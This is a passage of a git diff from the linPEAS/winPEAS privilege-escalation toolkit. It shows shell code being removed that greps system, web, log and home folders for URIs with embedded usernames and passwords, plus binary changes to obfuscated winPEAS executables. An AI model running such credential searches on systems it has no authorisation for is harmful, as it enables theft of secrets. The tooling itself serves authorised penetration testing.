{cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," - echo "" - fi - - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then - ##-- IF) Find URIs with user:password@hoststrings - print_2title "Finding URIs with user:password@host inside key folders" - timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - echo "" - fi fi +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi diff --git a/winPEAS/winPEASexe/binaries/Obfuscated Releases/Dotfuscated/any/winPEASany.exe b/winPEAS/winPEASexe/binaries/Obfuscated Releases/Dotfuscated/any/winPEASany.exe index 3d70794..a054f5a 100644 Binary files a/winPEAS/winPEASexe/binaries/Obfuscated Releases/Dotfuscated/any/winPEASany.exe and b/winPEAS/winPEASexe/binaries/Obfuscated Releases/Dotfuscated/any/winPEASany.exe differ diff --git a/winPEAS/winPEASexe/binaries/Obfuscated Releases/Dotfuscated/x64/winPEASx64.exe b/winPEAS/winPEASexe/binaries/Obfuscated Releases/Dotfuscated/x64/winPEASx64.exe index 4df76c6..7bfb378 100644 Binary files a/winPEAS/winPEASexe/binaries/Obfuscated Releases/Dotfuscated/x64/winPEASx64.exe and b/winPEAS/winPEASexe/binaries/Obfuscated Releases/Dotfuscated/x64/winPEASx64.exe differ diff --git a/winPEAS/winPEASexe/binaries/Obfuscated Releases/Dotfuscated/x86/winPEASx86.exe b/winPEAS/winPEASexe/binaries/Obfuscated Releases/Dotfuscated/x86/winPEASx86.exe index fa4cc3e..f45c2a6 100644 Binary files a/winPEAS/winPEASexe/binaries/Obfuscated Releases/Dotfuscated/x86/winPEASx86.exe and b/winPEAS/winPEASexe/binaries/Obfuscated Releases/Dotfuscated/x86/winPEASx86.exe differ diff --git a/winPEAS/winPEASexe/binaries/Obfuscated Releases/winPEASany.exe b/winPEAS/winPEASexe/binaries/Obfuscated Releases/winPEASany.exe index 3d70794..a054f5a 100755 Binary files a/winPEAS/winPEASexe/binaries/Obfuscated Releases/winPEASany.exe and b/winPEAS/winPEASexe/binaries/Obfuscated Releases/winPEASany.exe differ diff --git a/winPEAS/winPEASexe/binaries/Obfuscated Releases/winPEASx64.exe b/winPEAS/winPEASexe/binaries/Obfuscated Releases/winPEASx64.exe index 4df76c6..7bfb378 100755 Binary files a/winPEAS/winPEASexe/binaries/Obfuscated Releases/winPEASx64.exe and b/winPEAS/winPEASexe/binaries/Obfuscated Releases/winPEASx64.exe differ diff --git a/winPEAS/winPEASexe/binaries/Obfuscated Releases/winPEASx86.exe b/winPEAS/winPEASexe/binaries/Obfuscated Releases/winPEASx86.exe index fa4cc3e..f45c2a6 100755 Binary files a/winPEAS/winPEASexe/binaries/Obfuscated Releases/winPEASx86.exe and b/winPEAS/winPEASexe/binaries/Obfuscated Releases/winPEASx86.exe differ diff --git a/winPEAS/winPEASexe/binaries/Release/winPEASany.exe b/winPEAS/winPEASexe/binaries/Release/winPEASany.exe index 6493262..6dfce9b 100755 Binary files a/winPEAS/winPEASexe/binaries/Release/winPEASany.exe and b/winPEAS/winPEASexe/binaries/Release/winPEASany.exe differ diff --git a/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe b/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe index 867b1a6..347ec54 100755 Binary files a/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe and b/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe differ diff --git a/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe b/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe index c490843..0145b62 100755 Binary files a/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe and b/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe differ